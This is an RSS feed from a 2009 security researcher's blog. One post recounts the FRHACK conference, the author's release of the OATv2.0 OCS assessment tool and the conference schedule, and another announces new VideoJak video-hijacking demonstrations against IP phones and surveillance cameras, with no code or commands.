<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Bughira&#039;s Weblog</title>
	<atom:link href="http://bughira.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://bughira.wordpress.com</link>
	<description>There is no such thing as closed source software...the processor sees every instruction, and so does the reverse engineer...</description>
	<lastBuildDate>Thu, 24 Sep 2009 12:51:44 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='bughira.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Bughira&#039;s Weblog</title>
		<link>http://bughira.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://bughira.wordpress.com/osd.xml" title="Bughira&#039;s Weblog" />
	<atom:link rel='hub' href='http://bughira.wordpress.com/?pushpress=hub'/>
		<item>
		<title>OATv2.0 in FRHACK 01</title>
		<link>http://bughira.wordpress.com/2009/09/24/oatv2-0-in-frhack-01/</link>
		<comments>http://bughira.wordpress.com/2009/09/24/oatv2-0-in-frhack-01/#comments</comments>
		<pubDate>Thu, 24 Sep 2009 12:44:27 +0000</pubDate>
		<dc:creator>bughira</dc:creator>
				<category><![CDATA[ConferenceTalks]]></category>
		<category><![CDATA[Information Security]]></category>
		<category><![CDATA[OCS]]></category>
		<category><![CDATA[Security Tools]]></category>
		<category><![CDATA[Voice Over IP]]></category>
		<category><![CDATA[FRHACK]]></category>
		<category><![CDATA[OATv2.0]]></category>
		<category><![CDATA[OCS security]]></category>
		<category><![CDATA[Unified Communication Security]]></category>

		<guid isPermaLink="false">http://bughira.wordpress.com/?p=390</guid>
		<description><![CDATA[At last, after a loooong time, i got some time to breathe and the first thing i wanted to do is write post about my FRHACK experience. FRHACK is an International IT Security conference by Hackers, for Hackers It is organized by Jerome Athias, a well known hacker from france. First edition of FRHACK was [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bughira.wordpress.com&amp;blog=3478846&amp;post=390&amp;subd=bughira&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>At last, after a loooong time, i got some time to breathe and the first thing i wanted to do is write post about my <a title="FrHack" href="http://www.frhack.org/" target="_blank">FRHACK</a> experience.</p>
<p><img class="aligncenter size-full wp-image-391" title="frhack-conference-securite-informatique" src="http://bughira.files.wordpress.com/2009/09/frhack-conference-securite-informatique.jpg?w=600" alt="frhack-conference-securite-informatique"   /></p>
<p>FRHACK is an International IT Security conference by Hackers, for Hackers <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  It is organized by <a title="Jerom Profile " href="http://www.linkedin.com/in/jeromeathias" target="_blank">Jerome Athias</a>, a well known hacker from france. First edition of FRHACK was held in a small beautiful town <a title="Besacon information" href="http://en.wikipedia.org/wiki/Besan%C3%A7on" target="_blank">Besancon</a>.</p>
<p>As it was my first talk in an International Security Conference, I was amazed to see hackers around the world sharing their ideas and research work. I got chance to meet IT security gurus, hackers  like <a title="David Hulton" href="http://www.linkedin.com/in/h1kari" target="_blank">David Hulton</a> ( A well known crypto guy), <a title="OpenVAS" name="Vlatko-Kosturjak" href="http://www.openvas.org/" target="_blank">Vlatko Kosturjak ( OpenVAS team member), </a> <a title="Philippe Oechslin" href="http://www.linkedin.com/in/oechslin" target="_blank">Philippe Oechslin</a> ( Author of Rainbow Tables),<a title="Stallman" href="http://stallman.org/" target="_blank">Richard Stallman</a> ( Founder of <a title="Richard Stallman" href="http://www.gnu.org/" target="_blank">GNU project</a>).</p>
<div id="attachment_393" class="wp-caption aligncenter" style="width: 298px"><img class="size-full wp-image-393" title="David Hulton, Me and Blake Cornell" src="http://bughira.files.wordpress.com/2009/09/frhackpic.jpg?w=600" alt="FrhackPic"   /><p class="wp-caption-text">David Hulton, Me and Blake Cornell</p></div>
<p>And security consultants and Penetration Testers like <a title="Andres Riancho" href="http://www.linkedin.com/in/ariancho" target="_blank">Andres Raincho</a> ( Author of W3af tool),<a title="Jon Rose" href="http://www.linkedin.com/pub/jon-rose/3/9b6/719" target="_blank">jon Rose</a> , <a title="Blake Cornell" href="http://www.linkedin.com/in/blakecornell" target="_blank">Blake Cornell</a> ( One of my good friends and share the good name space in VoIP Security) ,  <a href="http://dev.tmplab.org/account/show/4">Nicolas Thill </a>( With amazing hair and co-author of HostilWRT)</p>
<div id="attachment_394" class="wp-caption aligncenter" style="width: 298px"><img class="size-full wp-image-394" title="Me, Jon Rose and  Andres Riancho" src="http://bughira.files.wordpress.com/2009/09/img_24861.jpg?w=600" alt="IMG_2486"   /><p class="wp-caption-text">Me, Jon Rose and  Andres Riancho</p></div>
<p>Conference was running in 2 tracks, it was difficult to attend all the talks. I attended some interesting talks including <strong>OpenVAS</strong>, <strong>The good, bad and ugly of crypto</strong> where david showed how easy it is to steal passwords from ASTRA VoIP phones, <strong>HostileWRT </strong>where <a href="http://dev.tmplab.org/account/show/4">Nicolas Thill</a> and <a href="http://www.linkedin.com/pub/philippe-langlois/0/1a6/500">Philippe Langlois</a> showed how HostileWRT can be used to turn friendly Wireless Access Point into an Autonomous, Curious, Standalone, Malicious &amp; Really Annoying Device.</p>
<div id="attachment_395" class="wp-caption aligncenter" style="width: 405px"><img class="size-full wp-image-395" title="My talk" src="http://bughira.files.wordpress.com/2009/09/mytalk.jpg?w=600" alt="Me speaking :)"   /><p class="wp-caption-text">Me speaking <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p></div>
<p>My talk was on <strong>Unified Communication Security</strong> with Microsoft Office Communication Server R1/R2 and was scheduled on second day of the conference. The sole purpose of the talk was to educate and create awareness about UC security around MS OCS R1/R2. At the end of the talk, I released a free source security assessment tool for MS OCS &#8211; <a title="Official OAT website" href="http://voat.sourceforge.net" target="_blank"><strong>OATv2.0</strong></a> which stands for <strong>O</strong>CS <strong>A</strong>ssessment <strong>T</strong>ool</p>
<div id="attachment_398" class="wp-caption aligncenter" style="width: 346px"><img class="size-full wp-image-398" title="OATv2.0" src="http://bughira.files.wordpress.com/2009/09/oat_splash2.jpg?w=600" alt="OATv2.0"   /><p class="wp-caption-text">OATv2.0</p></div>
<p>Previous release of OAT was result of some of our integration work and hence had some limitations on Authentication and Transportation protocol front. OAT v2.0 introduces new attack vectors against MS OCS server R1/R2 over TLS and NTLM/Kerberose Authentication protocols.</p>
<p>OAT v2.0 was officially presented and released in my talk at FRHACK 01 with demonstrations of attacks and usage in various penetration testing topologies. I am planning to upload <strong>OAT v2.0</strong> along with documentation on its official website soon. As there is no tool available for assessing Microsoft OCS servers, i hope OAT will help to improve security posture of OCS deployments.</p>
<p>I am sharing my slides, for those who missed FRHACK.</p>
<p>Also See :</p>
<ol>
<li><a title="Frhack: Day one" href="http://blog.rootshell.be/2009/09/07/frhack_01-day-one/" target="_blank">A brief commentry on FRHACK: Day One</a></li>
<li><a title="Frhack: Day Two" href="http://blog.rootshell.be/2009/09/08/frhack_01-day-two/" target="_blank">A brief commentry on FRHACK: Day two</a></li>
</ol>
<div id="_mcePaste" style="overflow:hidden;position:absolute;left:-10000px;top:242px;width:1px;height:1px;">
<h1>FRHACK</h1>
<h2>Conferences</h2>
<h3>NOW SHOWING</h3>
<p><strong>Can&#8217;t come to FRHACK? Don&#8217;t worry, we are providing <a title="FRHACK live streaming" href="http://www.mediatux.com/purchasefrhack.php">LIVE STREAMS</a> for you</strong>. + DVDs</p>
<table border="1">
<tbody>
<tr align="center">
<td></td>
<td colspan="2"><strong>Monday 7th<br />
</strong></td>
<td colspan="2"><strong>Tuesday 8th</strong></td>
<td><strong>9th &#8211; 11th </strong></td>
</tr>
<tr align="center">
<td>Hour</td>
<td><strong>Speaker track #1</strong></td>
<td><strong>Speaker track #2</strong></td>
<td><strong>Speaker track #1</strong></td>
<td><strong>Speaker track #2</strong></td>
<td><strong><a title="Hacking workshops, Computer security trainings FRHACK" href="http://www.frhack.org/frhack-trainings.php">Training / Workshop</a></strong></td>
</tr>
<tr align="center">
<td>8:00</td>
<td><a title="FRHACK registration" href="http://www.frhack.org/frhack-register.php">Registration</a></td>
<td></td>
<td><a title="FRHACK registration" href="http://www.frhack.org/frhack-register.php">Registration</a></td>
<td></td>
</tr>
<tr align="center">
<td>9:00</td>
<td><strong>Introduction</strong><br />
<a title="Jerome Athias" href="http://www.frhack.org/frhack-conference.php#Jerome-Athias">Jerome Athias</a><br />
EN/FR</td>
<td></td>
<td><strong><a title="Massive malicious activities (malware spreading, DDoS attacks)" href="http://www.frhack.org/frhack-conference.php#Massive-malicious-activities">Massive malicious activities (malware spreading, DDoS attacks)</a></strong><br />
-<br />
<a title="Alexey Kachalin" href="http://www.frhack.org/frhack-conference.php#Alexey-Kachalin">Alexey Kachalin</a><br />
EN</td>
<td><strong><a title="Building Hackerspaces Everywhere" href="http://www.frhack.org/frhack-conference.php#Building-Hackerspaces-Everywhere">Building Hackerspaces Everywhere</a></strong><br />
-<br />
<a title="Philippe Langlois" href="http://www.frhack.org/frhack-conference.php#Philippe-Langlois">Philippe Langlois</a><br />
EN/FR</td>
<td>Trainings / Workshops</td>
</tr>
<tr align="center">
<td>9:30</td>
<td><strong><a title="Social Engineering. Fuzzing the brain : applied social and cognitive psychology" href="http://www.frhack.org/frhack-conference.php#Social-Engineering">Fuzzing the brain : applied social and cognitive psychology</a></strong><br />
-<br />
<a title="Bruno Kerouanton" href="http://www.frhack.org/frhack-conference.php#Bruno-Kerouanton">Bruno Kerouanton</a><br />
EN/FR</td>
<td><strong><a title="OpenVAS - Open Vulnerability Scanning" href="http://www.frhack.org/frhack-conference.php#OpenVAS-Open-Vulnerability-Scanning">OpenVAS &#8211; Open Vulnerability Scanning</a></strong><br />
-<br />
<a title="Vlatko Kosturjak" href="http://www.frhack.org/frhack-conference.php#Vlatko-Kosturjak">Vlatko Kosturjak</a><br />
EN</td>
<td>&#8230;</td>
<td>&#8230;</td>
<td>Training / Workshop</td>
</tr>
<tr align="center">
<td>10:00</td>
<td><strong><a title="Reverse engineering and cryptographic errors" href="http://www.frhack.org/frhack-conference.php#Reverse-engineering-and-cryptographic-errors">Reverse engineering and cryptographic errors</a></strong><br />
-<br />
<a title="Philippe Oechslin" href="http://www.frhack.org/frhack-conference.php#Philippe-Oechslin">Philippe Oechslin</a><br />
EN/FR</td>
<td><strong><a title="HostileWRT - Abusing Embedded Hardware Platforms for Covert Operations" href="http://www.frhack.org/frhack-conference.php#HostileWRT-Wi-Fi-Hacking">HostileWRT &#8211; Abusing Embedded Hardware Platforms for Covert Operations</a></strong><br />
-<br />
<a title="HostileWRT Team" href="http://www.frhack.org/frhack-conference.php#HostileWRT-Team">HostileWRT Team</a><br />
FR/EN</td>
<td><strong><a title="New Algorithms for Attack Planning" href="http://www.frhack.org/frhack-conference.php#New-Algorithms-for-Attack-Planning">New Algorithms for Attack Planning</a></strong><br />
-<br />
<a title="Carlos Sarraute" href="http://www.frhack.org/frhack-conference.php#Carlos-Sarraute">Carlos Sarraute</a><br />
EN</td>
<td><strong><a title="All browsers MITM keylogging on remote" href="http://www.frhack.org/frhack-conference.php#browsers-MITM-keylogging">All browsers MITM keylogging on remote</a></strong><br />
-<br />
<a title="p3lo" href="http://www.frhack.org/frhack-conference.php#p3lo">p3lo</a><br />
FR</td>
<td>Training / Workshop</td>
</tr>
<tr align="center">
<td>11:00</td>
<td>Break</td>
<td>Break</td>
<td>Break</td>
<td>Break</td>
<td>Break</td>
</tr>
<tr align="center">
<td>11:30</td>
<td><strong><a title="The Good, the Bad, and the Ugly of Crypto" href="http://www.frhack.org/frhack-conference.php#bad-crypto">The Good, the Bad, and the Ugly of Crypto</a></strong><a title="The Good, the Bad, and the Ugly of Crypto" href="http://www.frhack.org/frhack-conference.php#bad-crypto"><br />
-<br />
</a><a title="David Hulton" href="http://www.frhack.org/frhack-conference.php#David-Hulton">David Hulton</a><br />
EN</td>
<td></td>
<td><strong><a title="Unified Communications Security" href="http://www.frhack.org/frhack-conference.php#Unified-Communications-Security">Unified Communications Security</a></strong><br />
-<br />
<a title="Abhijeet" href="http://www.frhack.org/frhack-conference.php#Abhijeet">Abhijeet Hatekar</a><br />
EN</td>
<td><strong><a title="SS7 security" href="http://www.frhack.org/frhack-conference.php#SS7-security">SS7</a></strong><br />
-<br />
<a title="Philippe Langlois" href="http://www.frhack.org/frhack-conference.php#Philippe-Langlois">Philippe Langlois</a><br />
FR/EN</td>
<td>Training / Workshop</td>
</tr>
<tr align="center">
<td>12:30</td>
<td>Lunch</td>
<td>Lunch</td>
<td>Lunch</td>
<td>Lunch</td>
<td>Lunch</td>
</tr>
<tr align="center">
<td>14:00</td>
<td><strong><em>-1 day talk announcement</em></strong><br />
-<br />
<a title="Cesar Cerrudo" href="http://www.frhack.org/frhack-conference.php#Cesar-Cerrudo">Cesar Cerrudo</a><br />
EN</td>
<td><strong><a title="Identification &amp; Exploitation of Business Logic Flaws in Web Applications" href="http://www.frhack.org/frhack-conference.php#business-flaws">Identification &amp; Exploitation of Business Logic Flaws in Web Applications</a></strong><br />
-<br />
<a title="Georgiadis Filippos" href="http://www.frhack.org/frhack-conference.php#Georgiadis-Filippos">Georgiadis Filippos</a><br />
EN</td>
<td><strong><a title="Wireless Sensor Networking as an Asset and a Liability" href="http://www.frhack.org/frhack-conference.php#Wireless-Sensors-Security">Wireless Sensor Networking as an Asset and a Liability</a></strong><br />
-<br />
<a title="Travis Goodspeed" href="http://www.frhack.org/frhack-conference.php#Travis-Goodspeed">Travis Goodspeed</a><br />
EN</td>
<td><strong><a title="Auditing and securing PHP applications" href="http://www.frhack.org/frhack-conference.php#securing-php">Auditing and securing PHP applications</a></strong><br />
-<br />
<a title="Philippe Gamache" href="http://www.frhack.org/frhack-conference.php#Philippe-Gamache">Philippe Gamache</a><br />
FR/EN</td>
<td>Training / Workshop</td>
</tr>
<tr align="center">
<td>15:00</td>
<td><strong><a title="Automated malware analysis, forensic analysis, anti-virus technology" href="http://www.frhack.org/frhack-conference.php#malware-analysis">Automated malware analysis, forensic analysis, anti-virus technology</a></strong><br />
-<br />
<a title="Mihai Chiriac" href="http://www.frhack.org/frhack-conference.php#Mihai-Chiriac">Mihai Chiriac</a><br />
EN</td>
<td><strong><a title="Memory forensic and incident response for live virtual machines" href="http://www.frhack.org/frhack-conference.php#virtual-machine-memory-forensic">Memory forensic and incident response for live virtual machine (VM)</a></strong><br />
-<br />
<a title="Nguyen Anh Quynh" href="http://www.frhack.org/frhack-conference.php#Nguyen-Anh-Quynh">Nguyen Anh Quynh</a><br />
EN</td>
<td><strong><a title="Asterisk Resource Exhaustion DoS" href="http://www.frhack.org/frhack-conference.php#Asterisk-Resource-Exhaustion-DoS">Asterisk Resource Exhaustion DoS: Don’t let the fuzz get you!</a></strong><br />
-<br />
<a title="Blake Cornell" href="http://www.frhack.org/frhack-conference.php#Blake-Cornell">Blake Cornell</a><br />
EN</td>
<td><strong><a title="OS Fingerprinting Defeating" href="http://www.frhack.org/frhack-conference.php#OS-Fingerprinting-Defeating">Mystification de la prise d&#8217;empreinte<br />
(OS Fingerprinting Defeating)</a></strong><br />
-<br />
<a title="Guillaume Prigent" href="http://www.frhack.org/frhack-conference.php#Guillaume-Prigent">Guillaume Prigent</a><br />
FR/EN</td>
<td>Training / Workshop</td>
</tr>
<tr align="center">
<td>16:00</td>
<td>Break</td>
<td>Break</td>
<td>Break</td>
<td>Break</td>
<td>Break</td>
</tr>
<tr align="center">
<td>16:30</td>
<td><strong><a title="w3af web application security framework" href="http://www.frhack.org/frhack-conference.php#w3af">w3af</a></strong><br />
-<br />
<a title="Andres Riancho" href="http://www.frhack.org/frhack-conference.php#Andres-Riancho">Andres Riancho</a><br />
EN</td>
<td><strong><a title="Lockpicking" href="http://www.frhack.org/frhack-conference.php#Lockpicking">Lockpicking</a></strong><br />
-<br />
<a title="Alexandre Triffault" href="http://www.frhack.org/frhack-conference.php#Alexandre-Triffault">Alexandre Triffault</a><br />
FR</td>
<td><strong><a title="Internet Marketing vs. Web Security: Guide to Extreme Black Hat Online Profits!" href="http://www.frhack.org/frhack-conference.php#web-security">Internet Marketing vs. Web Security:<br />
Guide to Extreme Black Hat Online Profits!</a></strong><br />
-<br />
<a title="Anselmus Ricky" href="http://www.frhack.org/frhack-conference.php#Anselmus-Ricky">Anselmus Ricky</a><br />
EN</td>
<td><a title="Flash Remote Hacking" href="http://www.frhack.org/frhack-conference.php#Flash-Remote-Hacking">Flash Remote Hacking</a><br />
-<br />
<a title="Jon Rose" href="http://www.frhack.org/frhack-conference.php#Jon-Rose">Jon Rose</a><br />
EN</td>
<td>Training / Workshop</td>
</tr>
<tr align="center">
<td>17:30</td>
<td><strong><a title="Free Software in Ethics and in Practice" href="http://www.frhack.org/frhack-conference.php#">Free Software in Ethics and in Practice</a></strong><br />
-<br />
<a href="http://www.frhack.org/frhack-conference.php#RMS">Richard Matthew Stallman</a><br />
EN/FR<br />
<a title="Richard Stallman Besançon" href="http://mediatux.com/webtvstream.php">FREE LIVE STREAM</a></td>
<td></td>
<td><strong><em>TBA</em></strong><br />
-<br />
<a title="Rodrigo Rubira Branco (BSDaemon)" href="http://www.frhack.org/frhack-conference.php#Rodrigo-Branco">Rodrigo Rubira Branco (BSDaemon)</a><br />
EN</td>
<td></td>
<td>Training / Workshop</td>
</tr>
</tbody>
</table>
<p><img src="http://www.frhack.org/images/2.jpg" alt="Oops! I hacked it again" /><br />
<a name="Social-Engineering"></a> <strong>Fuzzing the brain : applied social and cognitive psychology</strong><br />
Historically, cunnings and stratagems have been applied to battle plans, social promotion and money making. Sun Tzu, Machiavelli and many others have popularized such uses, but discoveries of the twenthieth century in the field of social psychology, coupled with inovations designed to convince consumers of the interest to buy, allowed a better undersranding of the dynamics of persuasion. The behavior of the humain being is ultimately predictable when certain stimuli are applied, which enables people who have mastered those principles to win the game.</p>
<p>- <a name="Bruno-Kerouanton">Bruno Kerouanton</a> (Switzerland)</p>
<p><img src="http://www.frhack.org/images/bougie.jpg" alt="Cryptographic reverse engineering" /><br />
<a name="Reverse-engineering-and-cryptographic-errors"></a> <strong>Reverse engineering and cryptographic errors</strong><br />
- <a name="Philippe-Oechslin">Philippe Oechslin</a> (<a title="Objectif Securite" href="http://www.objectif-securite.ch/">Objectif Sécurité</a>) (Switzerland)</p>
<p>Because any programmer can use a good crypto library to write crypto software it is often easier to crack a system by finding programming errors through reverse engineering rather than to cryptanalyse the algorithms used. We show this with three compelling examples:</p>
<p>- The MXI-stealth FIPS 140-3 level 2 certified key, were a poorly implemented &#8220;enterprise&#8221; feature allowed to extract unsalted hashes prior to authentication, before it got patched.</p>
<p>- A version of the E-capsule Private Safe software, where the manipulation of two bytes allows to use any of the admin, public, private or even panic password to access all data.</p>
<p>- The DataBecker PrivateSafe software, where a checksum ruins all the efforts of the blowfish key setup algorithm</p>
<p><img src="http://www.frhack.org/images/clavier_abcd.jpg" alt="Browsers Man-in-the-Middle" /><br />
<a name="browsers-MITM-keylogging"></a> <strong>All browsers MITM keylogging on remote</strong><br />
- <a name="p3lo">p3lo</a> (France)</p>
<p><a name="business-flaws"></a> <strong>Identification &amp; Exploitation of Business Logic Flaws in Web Applications</strong><br />
- <a name="Georgiadis-Filippos">Georgiadis Filippos</a> (Greece)</p>
<p>The talk will include an introduction into business logic and some theory on the identification and exploitation of business logic flaws for malicious purposes. Real life examples and scenarios (collected from my experience as penetration tester) will be presented. It will include a theoretical approach on the automation of the identification of business logic flaws and a presentation of BLe (A custom automated tool capable of detecting business logic flaws in web applications). Finally guidelines for safeguarding the applications against business logic flaws will be presented.</p>
<p><a name="w3af"></a> <strong>w3af</strong></p>
<p>Open Source tools like Nikto, Wapiti, Pantera and others try to find vulnerabilities in web applications but lack many features and configuration options. Comercial products have the features, but also have high product costs and are almost impossible to customize.</p>
<p><strong>w3af</strong> ( Web Application Attack and Audit Framework ) is an open source project that aims to automate the detection and explotation of all web application vulnerabilities. The project&#8217;s main objective is to become an open platform where anyone can contribute with new techniques and code to <strong>identify and exploit vulnerabilities</strong>. w3af&#8217;s core and plugins are fully written in Python and right now the project has more than 130 plugins and 60K lines of code!</p>
<p>My talk will introduce this tool to new users, while showing it&#8217;s features and the new GUI which was created during the last OWASP SoC. During the talk, I&#8217;ll perform a couple of demos of the main features and explain how the advanced exploitation features work.</p>
<p>- <a name="Andres-Riancho">Andres Riancho</a> (Argentine)<br />
Andrés Riancho is an information security researcher and founder of Bonsai, where he is mainly involved in Penetration Testing and Vulnerability Research. In the research field, he discovered critical vulnerabilities in IPS appliances from 3com and ISS; and contributed with SAP research performed at his former employer.</p>
<p>His main focus has always been the Web Application Security field, in which he developed w3af a Web Application Attack and Audit Framework used extensively by penetration testers and security consultants. Andrés has spoken and hold trainings at many security conferences around the globe, like OWASP (Poland), CONFidence (Poland), OWASP World C0n (USA), CanSecWest (Canada), T2 (Finland) and ekoparty (Buenos Aires).</p>
<p>Andrés founded <a title="Bonsai Security" href="http://www.bonsai-sec.com/">Bonsai</a> in 2009 in order to further research into automated Web Application Vulnerability detection and exploitation.</p>
<p><a name="Lockpicking"></a> <strong>Lockpicking</strong><br />
- <a title="Alexandre Triffault" name="Alexandre-Triffault">Alexandre Triffault</a> (France)</p>
<p><a name="Wireless-Sensors-Security"></a> <strong>Wireless Sensor Networking as an Asset and a Liability</strong><br />
<img src="http://www.frhack.org/images/travis-goodspeed.jpg" alt="Travis Goodspeed" /></p>
<p>- <a name="Travis-Goodspeed">Travis Goodspeed</a> (USA)</p>
<p><img src="http://www.frhack.org/images/wifi-sprayer.gif" alt="Turning Fonera into an automatic Wi-Fi hacking machine" /><br />
<a name="HostileWRT-Wi-Fi-Hacking"></a> <strong>HostileWRT &#8211; Abusing Embedded Hardware Platforms for Covert Operations</strong></p>
</div>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bughira.wordpress.com/390/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bughira.wordpress.com/390/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bughira.wordpress.com/390/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bughira.wordpress.com/390/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bughira.wordpress.com/390/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bughira.wordpress.com/390/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bughira.wordpress.com/390/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bughira.wordpress.com/390/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bughira.wordpress.com/390/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bughira.wordpress.com/390/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bughira.wordpress.com/390/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bughira.wordpress.com/390/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bughira.wordpress.com/390/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bughira.wordpress.com/390/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bughira.wordpress.com&amp;blog=3478846&amp;post=390&amp;subd=bughira&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bughira.wordpress.com/2009/09/24/oatv2-0-in-frhack-01/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/66d6f3751ae21240285913c9b962f9a4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">bughira</media:title>
		</media:content>

		<media:content url="http://bughira.files.wordpress.com/2009/09/frhack-conference-securite-informatique.jpg" medium="image">
			<media:title type="html">frhack-conference-securite-informatique</media:title>
		</media:content>

		<media:content url="http://bughira.files.wordpress.com/2009/09/frhackpic.jpg" medium="image">
			<media:title type="html">David Hulton, Me and Blake Cornell</media:title>
		</media:content>

		<media:content url="http://bughira.files.wordpress.com/2009/09/img_24861.jpg" medium="image">
			<media:title type="html">Me, Jon Rose and  Andres Riancho</media:title>
		</media:content>

		<media:content url="http://bughira.files.wordpress.com/2009/09/mytalk.jpg" medium="image">
			<media:title type="html">My talk</media:title>
		</media:content>

		<media:content url="http://bughira.files.wordpress.com/2009/09/oat_splash2.jpg" medium="image">
			<media:title type="html">OATv2.0</media:title>
		</media:content>

		<media:content url="http://www.frhack.org/images/2.jpg" medium="image">
			<media:title type="html">Oops! I hacked it again</media:title>
		</media:content>

		<media:content url="http://www.frhack.org/images/bougie.jpg" medium="image">
			<media:title type="html">Cryptographic reverse engineering</media:title>
		</media:content>

		<media:content url="http://www.frhack.org/images/clavier_abcd.jpg" medium="image">
			<media:title type="html">Browsers Man-in-the-Middle</media:title>
		</media:content>

		<media:content url="http://www.frhack.org/images/travis-goodspeed.jpg" medium="image">
			<media:title type="html">Travis Goodspeed</media:title>
		</media:content>

		<media:content url="http://www.frhack.org/images/wifi-sprayer.gif" medium="image">
			<media:title type="html">Turning Fonera into an automatic Wi-Fi hacking machine</media:title>
		</media:content>
	</item>
		<item>
		<title>VideoJak: Now Hijaking IP Video Surveillance Camera!!!</title>
		<link>http://bughira.wordpress.com/2009/08/03/videojak-now-hijaking-ip-video-surveillance-camera/</link>
		<comments>http://bughira.wordpress.com/2009/08/03/videojak-now-hijaking-ip-video-surveillance-camera/#comments</comments>
		<pubDate>Mon, 03 Aug 2009 06:03:07 +0000</pubDate>
		<dc:creator>bughira</dc:creator>
				<category><![CDATA[Information Security]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Voice Over IP]]></category>
		<category><![CDATA[Defcon 17]]></category>
		<category><![CDATA[Security Camera Hack]]></category>
		<category><![CDATA[VideoJak]]></category>
		<category><![CDATA[VIPER Lab]]></category>

		<guid isPermaLink="false">http://bughira.wordpress.com/2009/08/03/videojak-hijaking-ip-video-calls-2/</guid>
		<description><![CDATA[Researchers from VIPER Lab, kept their promise of delivering exciting and freaky features in the coming version of videoJak. VideoJak rocked Defcon 17 with some thrilling video attack demonstrations which we have seen only in Bond Movies.

<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bughira.wordpress.com&amp;blog=3478846&amp;post=380&amp;subd=bughira&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><strong>VIPER Lab</strong> researchers once again kept their promise of delivering exciting and freaky features in the upcoming version of <a title="VideoJak: Hijaking IP Video calls!!" href="http://videojak.sf.net/" target="_blank">videoJak</a>.</p>
<p>VideoJak rocked <a title="Deconf 17" href="https://www.defcon.org" target="_blank">Defcon 17</a> with some thrilling video attack demonstrations which we have seen only in Bond movies.</p>
<p>My <a title="VideoJak: Hijaking IP Video calls!!" href="http://bughira.wordpress.com/2009/02/26/videojak-hijaking-ip-video-calls/" target="_blank">earlier post</a> talked about the old version of VideoJak which was used to demonstrate proof of concept (PoC) Video DoS attack against Cisco 7985 IP video phones.</p>
<p><strong>VideoJak</strong> is updated with two brand new attacks.</p>
<ol>
<li>Video Replay, where same video stream is repeatedly played on the target video phone of  Cisco Surveillance  camera.</li>
<li>Inserts completely random video stream in the ongoing video conversation or live feed from Surveillance  cameras.</li>
</ol>
<p>Video Replay attack demo showed stealing of water bottle from the chair by replacing the live feed with the still video captured before the attack. While the second video attack demonstration played a short video clip from the movie <em>&#8220;The Italian job&#8221;, </em> thereby, replacing the live feed from surveillance camera.</p>
<blockquote>
<h2>We demand video solutions. Video solutions demand security <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </h2>
</blockquote>
<p>Here is the video demonstration of both of the above attacks.</p>
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
<object id="myExperience" class="BrightcoveExperience">
 <param name="bgcolor" value="" />
 <param name="width" value="404" />
 <param name="height" value="436" />
 <param name="playerID" value="1813626064" />
 <param name="@videoPlayer" value="31005440001" />
 <param name="playerKey" value="" />
 <param name="isVid" value="1" />
 <param name="isUI" value="1" />
 <param name="dynamicStreaming" value="true" />
</object>
<script type="text/javascript">brightcove.createExperiences();</script>
